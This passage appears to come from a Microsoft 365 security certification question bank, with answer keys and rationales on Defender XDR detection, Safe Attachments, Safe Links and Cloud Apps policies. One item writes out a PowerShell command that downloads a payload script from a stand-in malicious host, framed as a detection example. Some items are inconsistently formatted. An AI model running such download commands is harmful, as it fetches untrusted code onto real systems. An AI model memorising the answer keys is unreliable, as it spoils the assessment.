Safe Attachments policies with dynamic delivery allow users to view the email body while the attachment is being detonated in a sandbox. Zero-Hour Auto Purge (ZAP) then retroactively removes messages from the user’s inbox if a previously deemed benign attachment is later identified as malicious, addressing the false-positive concern.

Exam trap

The trap here is that candidates confuse Safe Attachments dynamic delivery with Safe Links URL detonation, or assume that anti-malware policies alone can retroactively remove malicious attachments, missing the critical ZAP integration for post-delivery remediation.

How to eliminate wrong answers

Option B is wrong because Safe Links policies protect against malicious URLs, not attachments, and URL detonation does not handle attachment analysis or post-delivery removal. Option C is wrong because anti-phishing policies with mailbox intelligence focus on impersonation and phishing detection, not attachment scanning or zero-day malware. Option D is wrong because an anti-malware policy with common attachments filter only blocks predefined file types (e.g., .exe, .scr) and does not provide dynamic delivery or retroactive removal via ZAP.

98
MCQeasy

You are a security administrator. You need to investigate a suspicious logon from an anonymous IP address. Which Microsoft Defender XDR data source should you query first?

A.Identity and authentication events
B.Cloud app events
C.Endpoint device events
D.Vulnerability and compliance events
E.Email & collaboration events
AnswerA

Identity and authentication events in Microsoft Defender XDR surface sign-in logs, including source IP, user agent and risk detections. Querying these first reveals whether the anonymous IP authenticated successfully and which account was targeted, directly addressing the suspicious logon scenario.

Why this answer

A suspicious logon from an anonymous IP address is an identity and authentication event. Microsoft Defender XDR's Identity and authentication events data source includes sign-in logs, authentication attempts, and related identity activities. Querying this source first will provide details such as the user account, IP address, location, and success/failure status, which are crucial for investigating the logon.

Exam trap

The trap is confusing identity events with cloud app events; logon attempts are identity events, while cloud app events are actions within apps after authentication.

How to eliminate wrong answers

Option B is wrong because cloud app events pertain to activities within cloud applications (e.g., Office 365), not raw logon events. Option C is wrong because endpoint device events focus on device processes and file activities, not authentication. Option D is wrong because vulnerability and compliance events relate to security posture, not logon attempts.

Option E is wrong because email and collaboration events cover email and Teams activities, not logon events.

99
MCQeasy

A company wants to receive alerts when a user account is used from an unauthorized location. They have Microsoft Defender for Cloud Apps (MDA). Which policy type should they create?

A.Create a session policy.
B.Create an app permissions policy.
C.Create a file policy.
D.Create an anomaly detection policy.
AnswerD

Anomaly detection policies in Microsoft Defender for Cloud Apps baseline normal user behaviour and alert on deviations such as impossible travel or unfamiliar sign-in locations. This directly satisfies the requirement to flag account use from unauthorised locations.

Why this answer

Anomaly detection policies in Microsoft Defender for Cloud Apps use machine learning and behavioral baselines to flag activities that deviate from a user's normal pattern — including logins from unfamiliar or unauthorized geographic locations. This is the correct policy type because the requirement is to detect unusual user behavior (impossible travel, atypical location) rather than to control sessions, permissions, or files. MDA's anomaly detection engine automatically surfaces alerts such as 'Activity from infrequent country' or 'Impossible travel' without needing a predefined rule.

Exam trap

MS-102 often tests the distinction between MDA policy types — candidates pick session or file policies because they sound security-relevant, but only anomaly detection policies are behavior-based and location-aware.

How to eliminate wrong answers

Option A is wrong because session policies are Conditional Access App Control policies that proxy and restrict user sessions in real time (e.g., block download, enforce DLP) — they do not generate location-based behavioral alerts. Option B is wrong because app permissions policies govern OAuth app consent and permission grants to third-party applications, not user login locations. Option C is wrong because file policies apply DLP or governance actions to files (e.g., quarantine, apply sensitivity labels) and have nothing to do with detecting logins from unauthorized locations.

100
MCQhard

A security analyst wants to automatically create a Microsoft Teams message in a dedicated security channel whenever a Microsoft 365 Defender incident with severity 'High' is created. Which automation approach should the analyst use?

A.Power Automate
B.Automation rules in Defender
C.Microsoft Graph API
D.Action Center
AnswerA

Power Automate flows offer a native trigger for Microsoft 365 Defender incidents, such as 'When an incident is created or updated,' and can then use the Microsoft Teams connector's 'Post message in a chat or channel' action to send a message to a specific channel. This low-code solution allows filtering by severity (e.g., High), supports adaptive cards for rich context, and can automatically execute without human intervention. It is the standard tool for integrating Defender incident generation with Teams notifications.

Why this answer

Power Automate is the correct choice because it provides a no-code/low-code workflow that can be triggered by Microsoft 365 Defender's 'When an incident is created or updated' connector, filter for severity 'High', and then post a message to a dedicated Teams channel via the 'Post a message in a chat or channel' action. This directly meets the requirement for automatic, event-driven notification without custom code.

Exam trap

The trap here is that candidates confuse 'automation rules' in Defender (which handle response actions like isolation) with external notification workflows, leading them to choose Option B instead of recognizing that Power Automate is the correct integration tool for sending Teams messages.

How to eliminate wrong answers

Option B is wrong because Automation rules in Defender are designed for automated response actions (e.g., isolating a device, blocking an IP) within the Defender portal itself, not for sending external notifications like Teams messages. Option C is wrong because while Microsoft Graph API can technically achieve this, it requires custom scripting, authentication setup, and manual polling or webhook configuration, making it less straightforward than Power Automate for a security analyst without developer resources. Option D is wrong because Action Center is a centralized interface for reviewing and approving pending remediation actions from Defender, not a tool for creating automated notifications or workflows.

101
MCQmedium

Your organization uses Microsoft Defender for Identity (MDI) and Microsoft Defender for Cloud Apps. You receive an alert about a user account that is exhibiting suspicious behavior: unusual login times from an IP address that is not in the user's typical location. The alert recommends action. You need to determine if the account is compromised. What is the best next step?

A.Initiate an automated investigation in Microsoft Defender XDR
B.Configure a conditional access policy in Microsoft Entra ID to block the IP
C.Immediately disable the user account
D.Reset the user's password
AnswerA

Automated investigation in Microsoft Defender XDR correlates the MDI sign-in anomaly with related alerts and entity data, gathering evidence and recommending remediation. This satisfies the need to determine compromise quickly without manually pivoting across portals.

Why this answer

Initiating an automated investigation in Microsoft Defender XDR correlates signals across MDI, Defender for Cloud Apps, and other Microsoft 365 services to determine if the account is compromised. Option B is wrong because configuring a conditional access policy is a preventive measure, not an investigative step to confirm compromise. Option C is wrong because disabling the account immediately might be premature and could disrupt legitimate access without confirming the threat.

Option D is wrong because resetting the password alone does not investigate other potential malicious activity or identify the scope of compromise.

102
MCQmedium

Your organization has Microsoft 365 E5 and uses Microsoft Defender for Cloud Apps. You want to block downloads from an unsanctioned cloud app that is used by some employees. What should you configure?

A.Create a DLP policy to block sharing of sensitive data with the app.
B.Create a conditional access policy to require the use of managed apps.
C.Block the app by its IP addresses in the firewall.
D.Configure the app as unsanctioned in Defender for Cloud Apps and create a session policy to block downloads.
AnswerD

Marking the app unsanctioned alone only flags it in Cloud Discovery; the session policy is what enforces control. Conditional Access app control proxies the session, and the block-download action satisfies the requirement to prevent data leaving via that unsanctioned cloud app.

Why this answer

Marking the app as unsanctioned in Defender for Cloud Apps and creating a session policy allows blocking downloads from that app. Option A is incorrect because a DLP policy protects data but does not block app usage. Option B is incorrect because a conditional access policy can enforce controls like requiring managed apps, but it does not directly block downloads from an unsanctioned app.

Option C is incorrect because blocking by IP address is ineffective for cloud apps that use dynamic IP ranges.

103
MCQeasy

You run the KQL query shown in the exhibit in Microsoft Defender XDR advanced hunting. What is the primary purpose of this query?

A.Identify all PowerShell activity from a specific user
B.Detect potentially malicious PowerShell commands that are obfuscated
C.Find PowerShell processes running on a specific device
D.List all PowerShell executions in the last 7 days
AnswerB

This query deliberately searches for PowerShell processes launched with the -EncodedCommand parameter, which causes the payload to be passed as a Base64 string. Encoded commands are a hallmark of obfuscation because attackers use them to hide malicious code from casual log inspection and signature-based detection. The presence of an encoded PowerShell command is therefore a valid trigger point for investigating potentially malicious behavior.

Why this answer

The query filters for powershell.exe processes with an encoded command, which is commonly used to obfuscate malicious commands. Option A is wrong because the query does not filter for specific users. Option C is wrong because the query does not filter by device.

Option D is wrong because the query does not filter by time other than the last 7 days.

104
MCQmedium

You run the above PowerShell command on a Windows 10 device that is onboarded to Microsoft Defender for Endpoint. The device is reporting as healthy in the portal, but you suspect that some behavioral detection capabilities are turned off. Based on the output, which setting should you modify?

A.Set DisableBehaviorMonitoring to False to enable behavior monitoring.
B.Enable cloud-delivered protection by setting MAPSReporting to Advanced.
C.Set DisableBlockAtFirstSeen to True to enable Block at First Sight.
D.Set DisableRealtimeMonitoring to True to enable real-time monitoring.
AnswerA

The existing output lists `DisableBehaviorMonitoring : True`, and because `Set-MpPreference` uses Boolean settings where `True` disables the corresponding feature, behavior monitoring is currently off. Running `Set-MpPreference -DisableBehaviorMonitoring $false` changes that value to `False`, turning on behavior monitoring. This Defender engine feature inspects process behavior, memory access, and system activity to detect fileless attacks and post-breach behaviors that static signature scanning may miss.

Why this answer

The PowerShell command output shows that DisableBehaviorMonitoring is set to True, which disables behavioral monitoring. Since the device is healthy but behavioral detection capabilities are suspected to be off, setting DisableBehaviorMonitoring to False re-enables behavior monitoring, allowing Defender for Endpoint to analyze runtime behavior for threats.

Exam trap

The trap here is that candidates confuse 'behavior monitoring' with 'real-time monitoring' or 'cloud-delivered protection,' leading them to select options that address unrelated security features instead of the specific setting shown in the PowerShell output.

How to eliminate wrong answers

Option B is wrong because MAPSReporting controls cloud-delivered protection (Microsoft Active Protection Service membership), not behavioral monitoring; setting it to Advanced enables cloud-based detection but does not address the disabled behavior monitoring. Option C is wrong because DisableBlockAtFirstSeen controls the Block at First Sight feature, which uses cloud intelligence to block new malware, but it is unrelated to behavioral monitoring. Option D is wrong because DisableRealtimeMonitoring controls real-time scanning for file-based threats; setting it to True would disable real-time monitoring, not enable it, and it does not affect behavioral monitoring.

105
MCQmedium

A company uses Microsoft Defender for Cloud Apps to monitor cloud app usage. They want to receive alerts when a user downloads a large number of files from SharePoint Online in a short time, which could indicate data exfiltration. What should they configure?

A.Session policy
B.Anomaly detection policy
C.File policy
D.Activity policy
AnswerD

Activity policies in Microsoft Defender for Cloud Apps evaluate user actions against detection criteria, so a threshold rule on SharePoint Online download volume within a set timeframe triggers alerts for suspected exfiltration. This directly satisfies the requirement to detect bulk file downloads, unlike anomaly or file policies.

Why this answer

(Activity policy) is correct because activity policies allow you to monitor specific activities like mass download from SharePoint Online and trigger alerts. Option A (Session policy) is used to control access in real-time, not for alerting on historical activity. Option B (Anomaly detection policy) detects unusual user behavior but is less specific to a defined threshold of file downloads.

Option C (File policy) focuses on file sharing and external sharing policies, not download volume. Therefore, an activity policy is the best choice for configuring alerts on large file downloads indicating data exfiltration.

106
Drag & Dropmedium

Drag and drop the steps to configure a Conditional Access policy in Microsoft Entra ID in the correct order.

Drag or tap steps into the slots.

Steps
Order
1Step 1
2Step 2
3Step 3
4Step 4

Why this order

Conditional Access policies are created in Entra ID, assigned to users, conditions defined, and access controls applied.

107
MCQeasy

Your company uses Microsoft Defender XDR. You need to review the list of incidents that were investigated automatically by the system. Where should you navigate in the Microsoft Defender portal?

A.Hunting
B.Action center
C.Reports
D.Incidents & alerts > Incidents
AnswerD

Incidents & alerts > Incidents is the central queue in the Microsoft 365 Defender portal where all security incidents—including those already escalated and automated investigations—are listed and managed. Each incident page consolidates related alerts from various workloads, affected assets, and the attack story, making it the correct location for reviewing and responding to incidents.

Why this answer

The 'Incidents & alerts > Incidents' section in the Microsoft Defender portal is the dedicated location where all incidents, including those automatically investigated by Microsoft Defender XDR's automated investigation and response (AIR) capabilities, are listed and managed. This view shows the incident queue, including the 'Investigation state' column that indicates whether an investigation was initiated automatically or manually, allowing you to filter and review system-initiated investigations.

Exam trap

The trap here is that candidates often confuse the 'Action center' (which shows remediation actions) with the incident list, mistakenly thinking that automated investigations are tracked there, but the Action center only shows the resulting actions, not the incidents or their investigation state.

How to eliminate wrong answers

Option A is wrong because 'Hunting' is used for proactive, custom threat hunting using Kusto Query Language (KQL) to search raw telemetry data, not for reviewing incidents that were already investigated automatically. Option B is wrong because the 'Action center' lists pending and completed remediation actions (e.g., quarantine, block) taken during investigations, but it does not show the incidents themselves or their investigation status. Option C is wrong because 'Reports' provides aggregated security trends and summary metrics (e.g., threat detection volume, response times), not a granular list of individual incidents or their automated investigation details.

108
Multi-Selectmedium

Which TWO actions can be performed by Microsoft Defender for Identity? (Select TWO.)

Select 2 answers
A.Manage firewall rules on endpoints.
B.Monitor domain controller activities and behavior.
C.Identify lateral movement paths in your network.
D.Scan files for malware in real time.
E.Block sign-in attempts from malicious IP addresses.
AnswersB, C

Microsoft Defender for Identity monitors domain controller activities and behaviour, satisfying the stem's requirement. It analyses authentication traffic and replication events on domain controllers to detect reconnaissance, lateral movement, and credential theft, without deploying agents on those servers.

Why this answer

Microsoft Defender for Identity is a cloud-based security solution that uses on-premises Active Directory signals to identify, detect, and investigate advanced threats, compromised identities, and malicious insider actions. It monitors domain controller activities and security events to detect suspicious behavior (Option B). It also identifies lateral movement paths by analyzing network activities and user behavior to find potential attack paths (Option C).

Option A is incorrect because managing firewall rules on endpoints is not a function of Defender for Identity; that is typically done by Microsoft Defender for Endpoint. Option D is incorrect because real-time file scanning is performed by Microsoft Defender Antivirus, not Defender for Identity. Option E is incorrect because blocking sign-ins from malicious IPs is handled by Azure AD Conditional Access or Identity Protection, not Defender for Identity.

109
MCQmedium

A company uses Microsoft Defender for Office 365. They want to ensure that users cannot ignore warning messages when clicking on a malicious link in an email. What should they configure?

A.Configure the anti-phishing policy with 'Impersonation protection' enabled.
B.Configure a Safe Links policy with 'Do not allow users to click through to original URL' selected.
C.Enable the 'Anti-malware' policy with 'Common attachments filter'.
D.Configure a Safe Attachments policy with 'Block' action.
AnswerB

A Safe Links policy with 'Do not allow users to click through to original URL' selected is the definitive control for stopping users from bypassing URL threat warnings. When a recipient clicks a link that Safe Links has evaluated as malicious or suspicious, Microsoft displays an interstitial warning page; this setting removes any 'proceed anyway' or 'continue to site' link, forcing a hard block. This directly addresses the stated requirement and is the only option among those listed that governs click-through behavior on links in email messages.

Why this answer

Safe Links policies include a setting 'Do not allow users to click through to the original URL' (or 'Block the following URLs' / 'Let users click through to the original URL' toggles). Selecting the option to prevent click-through ensures users cannot bypass the warning page and reach a malicious link. This is the direct control for the requirement.

Exam trap

The trap is that 'warning messages' sounds like anti-phishing or Safe Attachments, but the specific control for preventing click-through is a Safe Links policy setting — candidates must know which policy owns URL click behavior.

How to eliminate wrong answers

Option A is wrong because anti-phishing impersonation protection detects spoofed senders/domains but does not control URL click-through behavior. Option C is wrong because anti-malware with common attachments filter blocks attachment types — it has nothing to do with URL click-through. Option D is wrong because Safe Attachments with Block action detonates and blocks malicious attachments, not URLs; URL click-through is a Safe Links function.

110
MCQhard

Your organization uses Microsoft Defender for Identity. You need to investigate an alert indicating a suspected lateral movement using pass-the-hash from a compromised workstation. Which entity should you prioritize examining in the investigation timeline?

A.The source workstation
B.The destination server
C.The compromised account
D.The network segment
AnswerC

The compromised account is the correct primary entity because pass-the-hash attacks abuse the NTLM hash of a user's password, allowing the attacker to authenticate as that user without knowing the plaintext. This account is the common thread across every lateral movement event, regardless of which source workstation or destination server is involved. Defender for Identity flags suspicious account activities such as anomalous sign-ins, TGT requests, or usage of the same hash from multiple hosts, making the account the central entity to correlate and trace in the investigation.

Why this answer

In a pass-the-hash (PtH) attack, the attacker uses the NTLM hash of a compromised account to authenticate to other systems. Microsoft Defender for Identity correlates the account's authentication events across multiple machines, so examining the compromised account in the investigation timeline reveals the full scope of lateral movement, including which workstations and servers were accessed using the stolen hash.

Exam trap

The trap here is that candidates often focus on the physical or network location (workstation or server) rather than the logical identity (the account) that carries the stolen hash across systems.

How to eliminate wrong answers

Option A is wrong because the source workstation is merely the initial entry point; focusing on it ignores the attacker's subsequent authentication attempts using the stolen hash. Option B is wrong because the destination server is only one target of the lateral movement; prioritizing it misses other systems the attacker may have accessed. Option D is wrong because the network segment is a broad grouping that does not pinpoint the specific account or authentication events involved in the PtH attack.

111
MCQmedium

A security analyst investigates a potential data exfiltration incident. The analyst identifies that a user's device has made multiple connections to an unknown external IP address using a custom port. Which Microsoft Defender XDR data source would provide the most detailed network communication logs for this investigation?

A.Microsoft Defender for Office 365
B.Microsoft Defender for Cloud Apps
C.Microsoft Defender for Endpoint
D.Microsoft 365 Defender portal alerts
AnswerC

Defender for Endpoint is the correct source because its sensor records detailed network communication events on each device, including the local process, destination IP, destination port, and protocol, which are stored in the DeviceNetworkEvents table for advanced hunting. These logs directly show an inbound or outbound connection that could represent exfiltration, with the process and user context needed for a full investigation.

Why this answer

Microsoft Defender for Endpoint (MDE) provides the most detailed network communication logs for this investigation because it captures full network events at the device level, including connections to external IP addresses on custom ports. MDE's advanced hunting schema includes the DeviceNetworkEvents table, which records source/destination IPs, ports, protocols, and process-level details, enabling precise analysis of anomalous outbound connections.

Exam trap

The trap here is that candidates often confuse the scope of Microsoft Defender for Cloud Apps, assuming it captures all network traffic, when in fact it only monitors cloud application usage and not raw endpoint network connections.

How to eliminate wrong answers

Option A is wrong because Microsoft Defender for Office 365 focuses on email and collaboration threats (e.g., phishing, malware in attachments), not on device-level network traffic logs. Option B is wrong because Microsoft Defender for Cloud Apps provides visibility into cloud application usage and shadow IT, but it does not capture raw network connection logs from endpoints; it relies on API logs and traffic metadata from cloud apps. Option D is wrong because Microsoft 365 Defender portal alerts aggregate and correlate alerts from multiple sources but do not themselves store detailed network communication logs; they reference underlying data from MDE or other sources.

112
MCQeasy

A security administrator wants to detect unusual user activity, such as a user downloading an abnormally large number of files from SharePoint Online in a short period. Which Microsoft Defender for Cloud Apps feature should be used to create a policy for this behavior?

A.Cloud Discovery
B.Conditional Access App Control
C.Anomaly detection policy
D.App permissions
AnswerC

Anomaly detection policies in Microsoft Defender for Cloud Apps baseline normal user behaviour and alert on deviations such as mass file downloads from SharePoint Online. This matches the scenario's need to flag unusual activity rather than enforce static access rules.

Why this answer

Microsoft Defender for Cloud Apps uses anomaly detection policies to identify unusual user behavior, such as a user downloading an abnormally large number of files from SharePoint Online in a short period. These policies leverage machine learning to establish a baseline of normal activity and then trigger alerts when deviations occur, like a spike in download volume or rate.

Exam trap

The trap here is that candidates often confuse anomaly detection policies with Cloud Discovery, mistakenly thinking Cloud Discovery detects unusual user behavior, when in fact it only identifies unsanctioned cloud apps and services.

How to eliminate wrong answers

Option A is wrong because Cloud Discovery is designed to identify and analyze shadow IT usage by inspecting traffic logs from network proxies or firewalls, not to detect user-specific behavioral anomalies within sanctioned cloud apps like SharePoint Online. Option B is wrong because Conditional Access App Control enforces access policies (e.g., blocking downloads or requiring multi-factor authentication) at the session level, but it does not create detection policies for anomalous user behavior after access is granted. Option D is wrong because App permissions focuses on auditing and managing OAuth permissions granted to third-party apps, not on monitoring user download patterns or detecting unusual activity.

113
MCQmedium

You are a security administrator for Litware, Inc. The company uses Microsoft Defender XDR. You need to configure a custom detection rule that alerts when a user runs a specific PowerShell command on any device. The command is: `Invoke-WebRequest -Uri 'http://malicious.site/payload.ps1' -OutFile 'C:\temp\payload.ps1'`. Which advanced hunting table and column should you use to detect this activity?

A.DeviceEvents, using the AdditionalFields column.
B.DeviceFileEvents, using the FileName column.
C.DeviceProcessEvents, using the ProcessCommandLine column.
D.DeviceNetworkEvents, using the RemoteUrl column.
AnswerC

DeviceProcessEvents records process creation events on devices, including the command line used to launch the process. The ProcessCommandLine column contains the full command line, which would include the PowerShell command with the malicious URL and output file path. This is the correct table and column to detect the execution of the specific PowerShell command. Filtering on ProcessCommandLine for the URL or the command pattern will trigger the alert as required.

Why this answer

To detect a specific PowerShell command execution, you need the process creation event that includes the full command line. DeviceProcessEvents is the dedicated table for process events in Microsoft Defender for Endpoint, and ProcessCommandLine holds the command-line arguments. Filtering on this column for the malicious URL or command pattern will accurately trigger the custom detection rule.

Other tables either lack command-line data or are not designed for this purpose.

Exam trap

The trap here is assuming that network or file events are sufficient to detect a command execution, when in fact only process events capture the full command line.

114
MCQeasy

You are a security administrator for an organization that uses Microsoft Defender XDR. You want to provide your security operations team with a unified view of all incidents across endpoints, email, and identities. You also want to automate the creation of incidents when correlated alerts are detected. What should you do?

A.Navigate to the Microsoft Defender XDR portal (security.microsoft.com) and use the Incidents view.
B.Open the Microsoft Defender for Endpoint portal and create a dashboard for all alerts.
C.Install Microsoft Sentinel and configure data connectors for all workloads.
D.Create a custom KQL query that correlates alerts from different sources and create a workbook.
AnswerA

The Incidents view in the Microsoft Defender XDR portal correlates alerts across endpoints, email and identities into unified incidents, and automatic incident creation triggers when correlated alerts fire, meeting both the visibility and automation requirements.

Why this answer

The Microsoft Defender XDR portal (security.microsoft.com) provides a unified incident view and automatically correlates alerts from multiple workloads (endpoints, email, identities) into incidents. Option B is incorrect because Microsoft Defender for Endpoint portal focuses only on endpoint data, not the unified view across all services. Option C is incorrect because while Microsoft Sentinel can provide a unified view, it requires additional licensing, configuration, and does not automatically create incidents from correlated alerts without custom analytics rules.

Option D is incorrect because custom KQL queries and workbooks provide visibility but do not automate incident creation; that requires built-in correlation from Microsoft Defender XDR.

115
MCQmedium

A security administrator wants to reduce the risk of credential dumping from LSASS on managed Windows endpoints. Which Attack Surface Reduction rule should be enabled?

A.Block credential stealing from the Windows Local Security Authority Subsystem
B.Block executable files from running unless they meet prevalence, age, or trusted list criteria
C.Block untrusted and unsigned processes that run from USB
D.Block JavaScript or VBScript from launching downloaded executable content
AnswerA

This ASR rule is specifically designed to block attempts to open and read the memory space of the Local Security Authority Subsystem Service (LSASS), the process in which Windows stores authentication credentials. By intercepting suspicious process calls to LSASS, it directly stops credential dumping tools such as Mimikatz from extracting plaintext passwords and NTLM hashes. When enabled in block mode, it logs and prevents these access attempts, making it the correct rule for reducing credential dumping on managed devices.

Why this answer

The 'Block credential stealing from the Windows Local Security Authority Subsystem' ASR rule (GUID: 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2) specifically prevents credential dumping from LSASS by blocking access to the process memory via common techniques like Mimikatz or direct API calls (e.g., OpenProcess, ReadProcessMemory). This directly reduces the risk of credential theft on managed Windows endpoints.

Exam trap

The trap here is that candidates often confuse ASR rules with general malware prevention or USB controls, failing to recognize that the specific rule for LSASS credential protection is explicitly named and targeted at memory-based credential theft, not broader execution or download restrictions.

How to eliminate wrong answers

Option B is wrong because it describes the 'Block executable files from running unless they meet prevalence, age, or trusted list criteria' ASR rule (GUID: 01443614-cd74-433a-b99e-2ecdc07bfc25), which targets untrusted executables based on reputation, not credential dumping from LSASS. Option C is wrong because it refers to the 'Block untrusted and unsigned processes that run from USB' ASR rule (GUID: b2b3f03d-6a4c-4b7e-8c6d-1f3b2a1e5c4d), which focuses on USB-borne malware execution, not LSASS memory protection. Option D is wrong because it describes the 'Block JavaScript or VBScript from launching downloaded executable content' ASR rule (GUID: d4e5f6a7-8b9c-0d1e-2f3a-4b5c6d7e8f90), which prevents script-based download attacks, not direct credential theft from LSASS.

116
Multi-Selectmedium

Which THREE settings can you configure in a Microsoft Defender for Office 365 anti-phish policy?

Select 3 answers
A.Mailbox intelligence
B.Safe Attachments
C.DKIM signing
D.User impersonation protection
E.Spoof intelligence
AnswersA, D, E

Mailbox intelligence is configurable within anti-phish policies, satisfying the requirement for a genuine anti-phishing setting. It uses each user's historical communication patterns and frequent contacts to distinguish legitimate senders from impersonators, strengthening spoof and impersonation detection. Unlike transport rules or DLP settings, it belongs specifically to the anti-phish policy configuration surface.

Why this answer

Mailbox intelligence (A) is a configurable setting in an anti-phish policy that uses a user's past communication patterns to detect impersonation attempts. User impersonation protection (D) is also configured in anti-phish policies, allowing you to protect specific internal or external senders from impersonation. Spoof intelligence (E) is a configurable setting in anti-phish policies that controls how the service handles senders who spoof domains you don't own.

Safe Attachments (B) is a separate Defender for Office 365 policy (Safe Attachments policy), not a setting within an anti-phish policy. DKIM signing (C) is configured via DNS and Exchange Online mail flow settings, not within an anti-phish policy.

Exam trap

The trap is conflating all Defender for Office 365 protections into one policy type; candidates must know that Safe Attachments and DKIM are configured elsewhere, not inside anti-phish policies.

117
MCQeasy

A security administrator wants to ensure that all email attachments are scanned in a sandbox environment and blocked if malicious, with email delivery delayed until scanning completes. Which Microsoft 365 Defender policy should the administrator configure?

A.Safe Links policy
B.Safe Attachments policy
C.Anti-spam policy
D.Anti-phishing policy
AnswerB

Safe Attachments detonates attachments in a sandbox before delivery, holding the message until scanning finishes. This directly satisfies the requirement to delay email delivery until malicious content is confirmed and blocked, unlike Safe Links, which only rewrites URLs at click time.

Why this answer

Safe Attachments policy is the correct choice because it provides sandbox scanning of email attachments. It can be configured to delay email delivery until scanning is complete, blocking malicious attachments. This directly meets the requirement.

Exam trap

The trap here is that candidates often confuse Safe Attachments with Safe Links, assuming both handle attachments, but Safe Links only handles URLs, not file attachments, and the question explicitly requires sandbox scanning of attachments.

How to eliminate wrong answers

Option A is wrong because Safe Links policy protects users from malicious URLs in email messages and Office documents, not from email attachments; it does not perform sandbox scanning of files. Option C is wrong because Anti-spam policy filters inbound and outbound email based on spam, bulk mail, and phishing indicators, but it does not scan attachments in a sandbox environment. Option D is wrong because Anti-phishing policy protects against impersonation and spoofing attacks, not against malicious attachments; it does not include sandbox-based file scanning.

118
MCQmedium

You are a security administrator for a company that uses Microsoft Defender XDR. An analyst reports that a user's device is showing signs of compromise, and you need to isolate the device from the network while preserving the ability to collect forensic evidence. The device is running Windows 11 and is onboarded to Microsoft Defender for Endpoint. Which action should you take in the Microsoft 365 Defender portal?

A.Isolate the device from the network.
B.Run a full antivirus scan on the device.
C.Collect an investigation package from the device.
D.Initiate an automated investigation on the device.
AnswerA

Isolating the device from the network disconnects it from all network traffic except for the Defender for Endpoint service, allowing you to contain the threat while preserving the ability to collect forensic evidence remotely. This is the correct action to meet the requirement.

Why this answer

Isolating the device from the network is the correct action because it immediately contains the threat by restricting network communication while still allowing the Defender for Endpoint service to communicate with the device. This enables further investigation and evidence collection without risking lateral movement or data exfiltration.

Exam trap

The trap here is confusing isolation with other response actions like running a scan or collecting an investigation package, which do not contain the threat.

119
MCQhard

Your organization has Microsoft Defender for Cloud Apps deployed. You need to be alerted when a user performs more than 50 failed login attempts in an hour from a non-corporate IP address. Which type of policy should you create?

A.Session policy
B.Anomaly detection policy
C.File policy
D.Access policy
AnswerB

Anomaly detection policies in Defender for Cloud Apps use machine-learned behavioural baselines to flag deviations such as unusual failed-login volumes, satisfying the threshold and non-corporate IP conditions. Activity policies, by contrast, apply static, user-defined filters and cannot model anomalous sign-in behaviour.

Why this answer

An anomaly detection policy in Defender for Cloud Apps can detect unusual patterns like multiple failed login attempts from non-corporate IPs. Option A is wrong because a session policy controls real-time access but doesn't detect anomalies. Option C is wrong because a file policy monitors file activities, not login attempts.

Option D is wrong because an access policy enforces conditional access based on compliance, not anomaly detection.

120
Multi-Selecthard

A security analyst wants to create a custom detection rule that triggers when a user receives a phishing email that bypassed Exchange Online Protection, and then clicks a link that leads to a known malicious domain. Which two advanced hunting tables should the analyst combine to detect this chain of events?

Select 1 answer
A.EmailEvents and DeviceNetworkEvents
B.EmailEvents and UrlClickEvents
C.EmailEvents and IdentityLogonEvents
D.UrlClickEvents and DeviceNetworkEvents
AnswersB

EmailEvents captures delivery-level data, including whether Exchange Online Protection allowed the message through, while UrlClickEvents records Safe Links click telemetry against the URL and its verdict. Joining them on NetworkMessageId correlates the bypassed phishing email with the subsequent malicious-domain click, satisfying the required two-stage detection chain.

Why this answer

Combining EmailEvents (which captures email delivery) with UrlClickEvents (which records user clicks on URLs in emails) allows the analyst to identify the specific chain: a user received a phishing email and then clicked a link. This pair directly links the email receipt to the user's click action. Option D is incorrect because while UrlClickEvents and DeviceNetworkEvents can correlate a click to a network connection, they do not include the email receipt event (EmailEvents), which is essential to detect the full chain described: receiving a phishing email and then clicking a link.

Without EmailEvents, there is no evidence that the click originated from an email.

Exam trap

The trap is that candidates may think DeviceNetworkEvents can replace EmailEvents, but network logs alone cannot prove the click originated from an email. The detection must include EmailEvents to capture the phishing email receipt, which is the initial event in the chain.

121
MCQhard

You are a Microsoft 365 administrator for Tailspin Toys. You have Microsoft Defender XDR configured with Microsoft Defender for Office 365 and Microsoft Defender for Endpoint. You need to ensure that when a user clicks a malicious link in an email, the alert is enriched with the device information of the user's computer, and the device is automatically investigated. What should you do?

A.In Microsoft Defender for Endpoint, create a device group that includes all user devices and set the automation level to 'Full - remediate threats automatically'.
B.In Microsoft Defender for Office 365, configure the 'Alert correlation' setting to include device information from Defender for Endpoint.
C.Ensure that the 'Microsoft Defender for Endpoint' integration is enabled in Microsoft Defender XDR and that the device is onboarded.
D.Enable 'Advanced hunting' in Microsoft Defender XDR and create a custom detection rule that correlates email events with device events.
AnswerC

Microsoft Defender XDR automatically correlates alerts from Defender for Office 365 with device information from Defender for Endpoint when both services are integrated and the device is onboarded. This correlation enriches the alert and can trigger an automated investigation. Enabling the integration and onboarding devices is the correct approach.

Why this answer

Microsoft Defender XDR natively integrates alerts from Defender for Office 365 and Defender for Endpoint. When a user clicks a malicious link, the alert in Defender for Office 365 can be correlated with the device if the device is onboarded to Defender for Endpoint and the services are integrated. This correlation enriches the alert with device details and can automatically initiate an investigation.

Thus, ensuring the integration is enabled and devices are onboarded is the correct action.

Exam trap

The trap here is believing that custom detection rules or device groups can achieve cross-service alert enrichment, when it is actually a built-in integration feature.

122
MCQeasy

Your organization uses Microsoft Defender for Cloud Apps. You discover that a user is accessing a sanctioned cloud app from an unknown IP address. You want to require multi-factor authentication (MFA) for this access. What should you configure?

A.Create a file policy
B.Create an access policy
C.Create a session policy
D.Create an app discovery policy
AnswerB

A Microsoft Defender for Cloud Apps access policy evaluates session conditions such as the source IP address and can enforce step-up controls, including requiring MFA, for the sanctioned app. This satisfies the requirement to challenge access originating from the unknown IP address.

Why this answer

An access policy in Microsoft Defender for Cloud Apps can enforce conditional access controls, such as requiring multi-factor authentication (MFA), based on conditions like IP address. Option A is incorrect because file policies govern file sharing and cannot enforce MFA. Option C is incorrect because session policies monitor and control user activity in real time but do not directly enforce MFA.

Option D is incorrect because app discovery policies identify shadow IT and do not control access conditions.

123
MCQhard

A security analyst needs to create a custom detection rule in Microsoft Defender XDR that triggers when a user's device establishes a network connection to a known malicious IP address on a port commonly used by a specific malware. The rule must also include process information such as the filename of the process that initiated the connection. Which advanced hunting table should be the primary data source for this rule?

A.DeviceNetworkEvents
B.DeviceProcessEvents
C.DeviceFileEvents
D.IdentityLogonEvents
AnswerA

